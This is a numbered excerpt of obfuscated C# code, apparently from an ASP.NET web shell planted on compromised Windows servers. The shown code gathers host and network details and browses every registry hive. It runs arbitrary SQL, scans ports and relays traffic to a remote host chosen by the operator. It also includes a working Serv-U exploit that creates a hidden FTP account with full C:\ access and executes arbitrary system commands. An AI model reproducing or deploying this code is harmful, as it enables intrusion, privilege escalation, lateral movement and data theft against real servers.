1043. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1044. TableCell td=new TableCell();
1045. td.Text=user.Columns[j].ToString();
1046. tr.Controls.Add(td);
1047. TableCell td1=new TableCell();
1048. td1.Text=user.Rows[i][j].ToString();
1049. tr.Controls.Add(td1);
1050. VPa.Controls.Add(tr);
1051. }
1052. TableRow trn=new TableRow();
1053. for(int x=1;x<3;x++)
1054. {
1055. TableCell tdn=new TableCell();
1056. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1057. trn.Controls.Add(tdn);
1058. VPa.Controls.Add(trn);
1059. }
1060. }
1061. }
1062. catch(Exception error)
1063. {
1064. PLd();
1065. }
1066. }
1067. public void pDVM()
1068. {
1069. try
1070. {
1071. RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
1072. string IKjwH=DdmPl(EeZ,"PortNumber");
1073. RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
1074. int cpu=izN.SubKeyCount;
1075. RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
1076. string NPPZ=DdmPl(mQII,"ProcessorNameString");
1077. WICxe();
1078. ghaB.Visible=true;
1079. Bin_H2_Title.InnerText="System Information >>";
1080. Bin_H2_Mac.InnerText="MAC Information >>";
1081. Bin_H2_Driver.InnerText="Driver Information >>";
1082. StringBuilder yEwc=new StringBuilder();
1083. StringBuilder hwJeS=new StringBuilder();
1084. StringBuilder jXkaE=new StringBuilder();
1085. yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
1086. yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
1087. yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
1088. yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
1089. yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
1090. yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
1091. yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
1092. yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
1093. DataTable BIOS=cCf("Win32_BIOS");
1094. yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
1095. yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
1096. yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
1097. DataTable upM=cCf("Win32_PhysicalMemory");
1098. Int64 oZnZV=0;
1099. for(int i=0;i<upM.Rows.Count;i++)
1100. {
1101. oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
1102. }
1103. yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
1104. DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
1105. for(int i=0;i<dOza.Rows.Count;i++)
1106. {
1107. hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
1108. if(dOza.Rows[i]["MACAddress"]!=string.Empty)
1109. {
1110. hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
1111. }
1112. }
1113. DataTable Driver=cCf("Win32_SystemDriver");
1114. for (int i=0; i<Driver.Rows.Count; i++)
1115. {
1116. jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
1117. if (Driver.Rows[i]["PathName"]!=string.Empty)
1118. {
1119. jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
1120. }
1121. else
1122. {
1123. jXkaE.Append("No path information");
1124. }
1125. jXkaE.Append("</li>");
1126. }
1127. Bin_Ul_Sys.InnerHtml=yEwc.ToString();
1128. Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
1129. Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
1130. }
1131. catch(Exception error)
1132. {
1133. xseuB(error.Message);
1134. }
1135. }
1136. public void ADCpk()
1137. {
1138. WICxe();
1139. APl.Visible=true;
1140. Bin_H2_Title.InnerText="Serv-U Exec >>";
1141. }
1142. public void lDODR()
1143. {
1144. string JGGg=string.Empty;
1145. string user=dNohJ.Value;
1146. string pass=NMd.Value;
1147. int port=Int32.Parse(HlQl.Value);
1148. string cmd=mHbjB.Value;
1149. string CRtK="user "+user+"\r\n";
1150. string jnNG="pass "+pass+"\r\n";
1151. string site="SITE MAINTENANCE\r\n";
1152. string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
1153. string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
1154. string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
1155. string zexn="QUIT\r\n";
1156. UHlA.Visible=true;
1157. try
1158. {
1159. tcp.Connect("127.0.0.1",port);
1160. tcp.ReceiveBufferSize=1024;
1161. NS=tcp.GetStream();
1162. Rev(NS);
1163. ZJiM(NS,CRtK);
1164. Rev(NS);
1165. ZJiM(NS,jnNG);
1166. Rev(NS);
1167. ZJiM(NS,site);
1168. Rev(NS);
1169. ZJiM(NS,mtoJb);
1170. Rev(NS);
1171. ZJiM(NS,sutI);
1172. Rev(NS);
1173. ZJiM(NS,iVDT);
1174. Rev(NS);
1175. Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
1176. zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
1177. NS1=zvxm.GetStream();
1178. Rev(NS1);
1179. ZJiM(NS1,"user bin\r\n");
1180. Rev(NS1);
1181. ZJiM(NS1,"pass binftp\r\n");
1182. Rev(NS1);
1183. ZJiM(NS1,"site exec "+cmd+"\r\n");
1184. Rev(NS1);
1185. ZJiM(NS1,"quit\r\n");
1186. Rev(NS1);
1187. zvxm.Close();
1188. ZJiM(NS,mtoJb);
1189. Rev(NS);
1190. tcp.Close();
1191. }
1192. catch(Exception error)
1193. {
1194. xseuB(error.Message);
1195. }
1196. }
1197. protected void Rev(NetworkStream instream)
1198. {
1199. string FTBtf=string.Empty;
1200. if(instream.CanRead)
1201. {
1202. byte[] uPZ=new byte[1024];
1203. do
1204. {
1205. System.Threading.Thread.Sleep(50);
1206. int len=instream.Read(uPZ,0,uPZ.Length);
1207. FTBtf+=Encoding.Default.GetString(uPZ,0,len);
1208. }
1209. while(instream.DataAvailable);
1210. }
1211. Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
1212. }
1213. protected void ZJiM(NetworkStream instream,string Sendstr)
1214. {
1215. if(instream.CanWrite)
1216. {
1217. byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
1218. instream.Write(uPZ,0,uPZ.Length);
1219. }
1220. Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
1221. }
1222. public void xFhz()
1223. {
1224. WICxe();
1225. kkHN.Visible=true;
1226. Bin_H2_Title.InnerText="RegShell >>";
1227. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1228. vyX.Text="";
1229. foreach(string rootkey in txc.Split('|'))
1230. {
1231. vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
1232. }
1233. lFAvw();
1234. }
1235. protected void lFAvw()
1236. {
1237. qPdI.Text="";
1238. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1239. TableRow tr;
1240. TableCell tc;
1241. foreach(string rootkey in txc.Split('|'))
1242. {
1243. tr=new TableRow();
1244. tc=new TableCell();
1245. string bg=OKM();
1246. tr.Attributes["onmouseover"]="this.className='focus';";
1247. tr.CssClass=bg;
1248. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1249. tc.Width=Unit.Parse("40%");
1250. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
1251. tr.Cells.Add(tc);
1252. tc=new TableCell();
1253. tc.Width=Unit.Parse("60%");
1254. tc.Text="&lt;RootKey&gt;";
1255. tr.Cells.Add(tc);
1256. pLWD.Rows.Add(tr);
1257. }
1258. }
1259. protected void tpRQ(string Reg_Path)
1260. {
1261. if(!Reg_Path.EndsWith("\\"))
1262. {
1263. Reg_Path=Reg_Path+"\\";
1264. }
1265. qPdI.Text=Reg_Path;
1266. string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
1267. cJG=Regex.Replace(cJG,@"\\+","\\");
1268. TableRow tr=new TableRow();
1269. TableCell tc=new TableCell();
1270. string bg=OKM();
1271. tr.Attributes["onmouseover"]="this.className='focus';";
1272. tr.CssClass=bg;
1273. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1274. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
1275. tc.Attributes["colspan"]="2" ;
1276. tr.Cells.Add(tc);
1277. pLWD.Rows.Add(tr);
1278. try
1279. {
1280. string subpath;
1281. string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
1282. RegistryKey rk=null;
1283. RegistryKey sk;
1284. if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
1285. {
1286. rk=Registry.LocalMachine;
1287. }
1288. else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
1289. {
1290. rk=Registry.ClassesRoot;
1291. }
1292. else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
1293. {
1294. rk=Registry.CurrentUser;
1295. }
1296. else if(Reg_Path.StartsWith("HKEY_USERS"))
1297. {
1298. rk=Registry.Users;
1299. }
1300. else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
1301. {
1302. rk=Registry.CurrentConfig;
1303. }
1304. if(kDgkX.Length>1)
1305. {
1306. sk=rk.OpenSubKey(kDgkX);
1307. }
1308. else
1309. {
1310. sk=rk;
1311. }
1312. foreach(string innerSubKey in sk.GetSubKeyNames())
1313. {
1314. tr=new TableRow();
1315. tc=new TableCell();
1316. bg=OKM();
1317. tr.Attributes["onmouseover"]="this.className='focus';";
1318. tr.CssClass=bg;
1319. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1320. tc.Width=Unit.Parse("40%");
1321. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
1322. tr.Cells.Add(tc);
1323. tc=new TableCell();
1324. tc.Width=Unit.Parse("60%");
1325. tc.Text="&lt;SubKey&gt;";
1326. tr.Cells.Add(tc);
1327. pLWD.Rows.Add(tr);
1328. }
1329. TableRow cKVA=new TableRow();
1330. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
1331. cKVA.Attributes["bgcolor"]="#dddddd";
1332. TableCell JlmW=new TableCell();
1333. JlmW.Attributes["colspan"]="2" ;
1334. JlmW.Attributes["height"]="5";
1335. cKVA.Cells.Add(JlmW);
1336. pLWD.Rows.Add(cKVA);
1337. foreach(string strValueName in sk.GetValueNames())
1338. {
1339. tr=new TableRow();
1340. tc=new TableCell();
1341. bg=OKM();
1342. tr.Attributes["onmouseover"]="this.className='focus';";
1343. tr.CssClass=bg;
1344. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1345. tc.Width=Unit.Parse("40%");
1346. tc.Text=strValueName;
1347. tr.Cells.Add(tc);
1348. tc=new TableCell();
1349. tc.Width=Unit.Parse("60%");
1350. tc.Text=DdmPl(sk,strValueName);
1351. tr.Cells.Add(tc);
1352. pLWD.Rows.Add(tr);
1353. }
1354. }
1355. catch(Exception error)
1356. {
1357. xseuB(error.Message);
1358. }
1359. }
1360. public string DdmPl(RegistryKey sk,string strValueName)
1361. {
1362. object uPZ;
1363. string RaTGr="";
1364. try
1365. {
1366. uPZ=sk.GetValue(strValueName,"NULL");
1367. if(uPZ.GetType()==typeof(byte[]))
1368. {
1369. foreach(byte tmpbyte in(byte[])uPZ)
1370. {
1371. if((int)tmpbyte<16)
1372. {
1373. RaTGr+="0";
1374. }
1375. RaTGr+=tmpbyte.ToString("X");
1376. }
1377. }
1378. else if(uPZ.GetType()==typeof(string[]))
1379. {
1380. foreach(string tmpstr in(string[])uPZ)
1381. {
1382. RaTGr+=tmpstr;
1383. }
1384. }
1385. else
1386. {
1387. RaTGr=uPZ.ToString();
1388. }
1389. }
1390. catch(Exception error)
1391. {
1392. xseuB(error.Message);
1393. }
1394. return RaTGr;
1395. }
1396. public void vNCHZ()
1397. {
1398. WICxe();
1399. YwLB.Visible=true;
1400. Bin_H2_Title.InnerText="PortScan >>";
1401. }
1402. public void rAhe()
1403. {
1404. WICxe();
1405. iDgmL.Visible=true;
1406. dQIIF.Visible=false;
1407. Bin_H2_Title.InnerText="DataBase >>";
1408. }
1409. protected void OUj()
1410. {
1411. if(Dtdr.State==ConnectionState.Closed)
1412. {
1413. try
1414. {
1415. Dtdr.ConnectionString=MasR.Text;
1416. Kkvb.Connection=Dtdr;
1417. Dtdr.Open();
1418. }
1419. catch(Exception Error)
1420. {
1421. xseuB(Error.Message);
1422. }
1423. }
1424. }
1425. protected void fUzE()
1426. {
1427. if(Dtdr.State==ConnectionState.Open)
1428. Dtdr.Close();
1429. Dtdr.Dispose();
1430. Kkvb.Dispose();
1431. }
1432. public DataTable CYUe(string sqlstr)
1433. {
1434. OleDbDataAdapter da=new OleDbDataAdapter();
1435. DataTable Dstog=new DataTable();
1436. try
1437. {
1438. OUj();
1439. Kkvb.CommandType=CommandType.Text;
1440. Kkvb.CommandText=sqlstr;
1441. da.SelectCommand=Kkvb;
1442. da.Fill(Dstog);
1443. }
1444. catch(Exception)
1445. {
1446. }
1447. finally
1448. {
1449. fUzE();
1450. }
1451. return Dstog;
1452. }
1453. public DataTable[] Bin_Data(string query)
1454. {
1455. ArrayList list=new ArrayList();
1456. try
1457. {
1458. string str;
1459. OUj();
1460. query=query+"\r\n";
1461. MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
1462. int EmRX=0;
1463. for(int i=0;i<gcod.Count;i++)
1464. {
1465. Match FJD=gcod[i];
1466. str=query.Substring(EmRX,FJD.Index-EmRX);
1467. if(str.Trim().Length>0)
1468. {
1469. OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
1470. Kkvb.CommandType=CommandType.Text;
1471. Kkvb.CommandText=str.Trim();
1472. FgzeQ.SelectCommand=Kkvb;
1473. DataSet cDPp=new DataSet();
1474. FgzeQ.Fill(cDPp);
1475. for(int j=0;j<cDPp.Tables.Count;j++)
1476. {
1477. list.Add(cDPp.Tables[j]);
1478. }
1479. }
1480. EmRX=FJD.Index+3;
1481. }
1482. str=query.Substring(EmRX,query.Length-EmRX);
1483. if(str.Trim().Length>0)
1484. {
1485. OleDbDataAdapter VwB=new OleDbDataAdapter();
1486. Kkvb.CommandType=CommandType.Text;
1487. Kkvb.CommandText=str.Trim();
1488. VwB.SelectCommand=Kkvb;
1489. DataSet arG=new DataSet();
1490. VwB.Fill(arG);
1491. for(int k=0;k<arG.Tables.Count;k++)
1492. {
1493. list.Add(arG.Tables[k]);
1494. }
1495. }
1496. }
1497. catch(SqlException e)
1498. {
1499. xseuB(e.Message);
1500. rom.Visible=false;
1501. }
1502. return(DataTable[])list.ToArray(typeof(DataTable));
1503. }
1504. public void JIAKU(string instr)
1505. {
1506. try
1507. {
1508. OUj();
1509. Kkvb.CommandType=CommandType.Text;
1510. Kkvb.CommandText=instr;
1511. Kkvb.ExecuteNonQuery();
1512. }
1513. catch(Exception e)
1514. {
1515. xseuB(e.Message);
1516. }
1517. }
1518. public void dwgT()
1519. {
1520. try
1521. {
1522. OUj();
1523. if(WYmo.SelectedItem.Text=="MSSQL")
1524. {
1525. if(Pvf.SelectedItem.Value!="")
1526. {
1527. Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
1528. }
1529. }
1530. DataTable[] jxF=null;
1531. jxF=Bin_Data(jHIy.InnerText);
1532. if(jxF!=null && jxF.Length>0)
1533. {
1534. for(int j=0;j<jxF.Length;j++)
1535. {
1536. rom.PreRender+=new EventHandler(lRavM);
1537. rom.DataSource=jxF[j];
1538. rom.DataBind();
1539. for(int i=0;i<rom.Items.Count;i++)
1540. {
1541. string bg=OKM();
1542. rom.Items[i].CssClass=bg;
1543. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1544. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1545. }
1546. }
1547. }
1548. else
1549. {
1550. rom.DataSource=null;
1551. rom.DataBind();
1552. }
1553. rom.Visible=true;
1554. }
1555. catch(Exception e)
1556. {
1557. xseuB(e.Message);
1558. rom.Visible=false;
1559. }
1560. }
1561. public void xTZY()
1562. {
1563. try
1564. {
1565. if(WYmo.SelectedItem.Text=="MSSQL")
1566. {
1567. if(Pvf.SelectedItem.Value=="")
1568. {
1569. rom.DataSource=null;
1570. rom.DataBind();
1571. return;
1572. }
1573. }
1574. OUj();
1575. DataTable zKvOw=new DataTable();
1576. DataTable jxF=new DataTable();
1577. DataTable baVJV=new DataTable();
1578. if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
1579. {
1580. Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
1581. }
1582. zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
1583. jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
1584. foreach(DataRow dr in zKvOw.Rows)
1585. {
1586. jxF.ImportRow(dr);
1587. }
1588. jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
1589. rom.PreRender+=new EventHandler(lRavM);
1590. rom.DataSource=jxF;
1591. rom.DataBind();
1592. for(int i=0;i<rom.Items.Count;i++)
1593. {
1594. string bg=OKM();
1595. rom.Items[i].CssClass=bg;
1596. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1597. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1598. }
1599. rom.Visible=true;
1600. }
1601. catch(Exception e)
1602. {
1603. xseuB(e.Message);
1604. rom.Visible=false;
1605. }
1606. }
1607. private void lRavM(object sender,EventArgs e)
1608. {
1609. DataGrid d=(DataGrid)sender;
1610. foreach(DataGridItem item in d.Items)
1611. {
1612. foreach(TableCell t in item.Cells)
1613. {
1614. t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
1615. }
1616. }
1617. }
1618. public void vCf()
1619. {
1620. dQIIF.Visible=true;
1621. try
1622. {
1623. jHIy.InnerHtml=string.Empty;
1624. if(WYmo.SelectedItem.Text=="MSSQL")
1625. {
1626. rom.Visible=false;
1627. uXevN.Visible=true;
1628. irTU.Visible=true;
1629. OUj();
1630. DataTable ver=CYUe(@"SELECT @@VERSION");
1631. DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
1632. DataTable cdb=CYUe(@"SELECT DB_NAME()");
1633. DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
1634. DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
1635. string jHlh=ver.Rows[0][0].ToString();
1636. string dbo=string.Empty;
1637. if(YKrm.Rows[0][0].ToString()=="1")
1638. {
1639. dbo="db_owner";
1640. }
1641. else
1642. {
1643. dbo="public";
1644. }
1645. if(rol.Rows[0][0].ToString()=="1")
1646. {
1647. dbo="<font color=blue>sa</font>";
1648. }
1649. string db_name=string.Empty;
1650. foreach(ListItem item in FGEy.Items)
1651. {
1652.  if(item.Selected=true)
1653.  {
1654.  item.Selected=false;
1655.  }
1656. }
1657. Pvf.Items.Clear();
1658. Pvf.Items.Add("-- Select a DataBase --");
1659. Pvf.Items[0].Value="";
1660. for(int i=0;i<dbs.Rows.Count;i++)
1661. {
1662. db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
1663. Pvf.Items.Add(dbs.Rows[i][0].ToString());
1664. }
1665. irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
1666. }
1667. else
1668. {
1669. uXevN.Visible=false;
1670. irTU.Visible=false;
1671. xTZY();
1672. }
1673. }
1674. catch(Exception e)
1675. {
1676. dQIIF.Visible=false;
1677. }
1678. }
1679. public void MHLv()
1680. {
1681. WICxe();
1682. hOWTm.Visible=true;
1683. Bin_H2_Title.InnerText="PortMap >>";
1684. }
1685. public class PortForward
1686. {
1687. public string Localaddress;
1688. public int LocalPort;
1689. public string RemoteAddress;
1690. public int RemotePort;
1691. string type;
1692. Socket ltcpClient;
1693. Socket rtcpClient;
1694. Socket server;
1695. byte[] DPrPL=new byte[2048];
1696. byte[] wvZv=new byte[2048];
1697. public struct session
1698. {
1699. public Socket rdel;
1700. public Socket ldel;
1701. public int llen;
1702. public int rlen;
1703. }
1704. public static IPEndPoint mtJ(string host,int port)
1705. {
1706. IPEndPoint iep=null;
1707. IPHostEntry aGN=Dns.Resolve(host);
1708. IPAddress rmt=aGN.AddressList[0];
1709. iep=new IPEndPoint(rmt,port);
1710. return iep;
1711. }
1712. public void Start(string Rip,int Rport,string lip,int lport)
1713. {
1714. try
1715. {
1716. LocalPort=lport;
1717. RemoteAddress=Rip;
1718. RemotePort=Rport;
1719. Localaddress=lip;
1720. rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1721. ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1722. rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
1723. }
1724. catch (Exception ex) { }
1725. }
1726. protected void iiGFO(IAsyncResult ar)
1727. {
1728. try
1729. {
1730. session RKXy=new session();
1731. RKXy.ldel=ltcpClient;
1732. RKXy.rdel=rtcpClient;
1733. ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
1734. }
1735. catch (Exception ex) { }
1736. }
1737. protected void VTp(IAsyncResult ar)
1738. {
1739. try
1740. {
1741. session RKXy=(session)ar.AsyncState;
1742. ltcpClient.EndConnect(ar);
1743. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
1744. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
1745. }
1746. catch (Exception ex) { }
1747. }
1748. private void LFYM(IAsyncResult ar)
1749. {
1750. try
1751. {
1752. session RKXy=(session)ar.AsyncState;
1753. int Ret=RKXy.rdel.EndReceive(ar);
1754. if (Ret>0)
1755. ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
1756. else lyTOK();
1757. }
1758. catch (Exception ex) { }
1759. }
1760. private void JTcp(IAsyncResult ar)
1761. {
1762. try
1763. {
1764. session RKXy=(session)ar.AsyncState;
1765. RKXy.ldel.EndSend(ar);
1766. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
1767. }
1768. catch (Exception ex) { }
1769. }
1770. private void xPS(IAsyncResult ar)
1771. {
1772. try
1773. {
1774. session RKXy=(session)ar.AsyncState;
1775. int Ret=RKXy.ldel.EndReceive(ar);
1776. if (Ret>0)
1777. RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
1778. else lyTOK();
1779. }
1780. catch (Exception ex) { }
1781. }
1782. private void IZU(IAsyncResult ar)
1783. {
1784. try
1785. {
1786. session RKXy=(session)ar.AsyncState;
1787. RKXy.rdel.EndSend(ar);
1788. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
1789. }
1790. catch (Exception ex) { }
1791. }
1792. public void lyTOK()
1793. {
1794. try
1795. {
1796. if (ltcpClient!=null)
1797. {
1798. ltcpClient.Close();
1799. }
1800. if (rtcpClient!=null)
1801. rtcpClient.Close();
1802. }
1803. catch (Exception ex) { }
1804. }
1805. }
1806. protected void vuou()
1807. {
1808. PortForward gYP=new PortForward();
1809. gYP.lyTOK();
1810. }
1811. protected void ruQO()
1812. {
1813. PortForward gYP=new PortForward();
1814. gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
1815. }
1816. public string mRDl(string instr)
1817. {
1818. string tmp=null;
1819. try
1820. {
1821. tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
1822. }
1823. catch(Exception e)
1824. {
1825. }
1826. return tmp;
1827. }
1828. public void VikG()
1829. {
1830. string[] OTV=lOmX.Text.ToString().Split(',');
1831. for(int i=0;i<OTV.Length;i++)
1832. {
1833. IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
1834. }
1835. try
1836. {
1837. Thread[] kbXY=new Thread[IVc.Count];
1838. int sdO=0;
1839. for(sdO=0;sdO<IVc.Count;sdO++)
1840. {
1841. kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
1842. kbXY[sdO].Start();
1843. }
1844. for(sdO=0;sdO<kbXY.Length;sdO++)
1845. kbXY[sdO].Join();
1846. }
1847. catch
1848. {
1849. }
1850. }
1851. public class ScanPort
1852. {
1853. private string _ip="";
1854. private int jTdO=0;
1855. private TimeSpan _timeSpent;
1856. private string QGcH="Not scanned";
1857. public string ip
1858. {
1859. get { return _ip;}
1860. }
1861. public int port
1862. {
1863. get { return jTdO;}
1864. }
1865. public string status
1866. {
1867. get { return QGcH;}
1868. }
1869. public TimeSpan timeSpent
1870. {
1871. get { return _timeSpent;}
1872. }
1873. public ScanPort(string ip,int port)
1874. {
1875. _ip=ip;
1876. jTdO=port;
1877. }
1878. public void Scan()
1879. {
1880. TcpClient iYap=new TcpClient();
1881. DateTime qYZT=DateTime.Now;
1882. try
1883. {
1884. iYap.Connect(_ip,jTdO);
1885. iYap.Close();
1886. QGcH="<font color=green><b>Open</b></font>";
1887. }
1888. catch
1889. {
1890. QGcH="<font color=red><b>Close</b></font>";
1891. }
1892. _timeSpent=DateTime.Now.Subtract(qYZT);
1893. }
1894. }
1895. public static void YFcNP(System.Web.UI.Page page)
1896. {
1897. page.RegisterHiddenField("__EVENTTARGET","");
1898. page.RegisterHiddenField("__FILE","");
1899. string s=@"<script language=Javascript>";
1900. s+=@"function Bin_PostBack(eventTarget,eventArgument)";
1901. s+=@"{";
1902. s+=@"var theform=document.forms[0];";
1903. s+=@"theform.__EVENTTARGET.value=eventTarget;";
1904. s+=@"theform.__FILE.value=eventArgument;";
1905. s+=@"theform.submit();";
1906. s+=@"} ";
1907. s+=@"</scr"+"ipt>";
1908. page.RegisterStartupScript("",s);
1909. }
1910. protected void PPtK(object sender,EventArgs e)
1911. {
1912. WICxe();
1913. yhv.Visible=true;
1914. Bin_H2_Title.InnerText="File Search >>";
1915. NaLJ.Value=Request.PhysicalApplicationPath;
1916. oJiym.Visible=false;
1917. }
1918. protected void NBy(object sender,EventArgs e)
1919. {
1920. DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
1921. if(!GQMM.Exists)
1922. {
1923. xseuB("Path invalid ! ");
1924. return;
1925. }
1926. oog(GQMM);
1927. xseuB("Search completed ! ");
1928. }
1929. public void oog(DirectoryInfo dir)
1930. {
1931. try
1932. {
1933. oJiym.Visible=true;
1934. foreach(FileInfo Bin_Files in dir.GetFiles())
1935. {
1936. try
1937. {
1938. if(Bin_Files.FullName==Request.PhysicalPath)
1939. {
1940. continue;
1941. }
1942. if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
1943. {
1944. continue;
1945. }
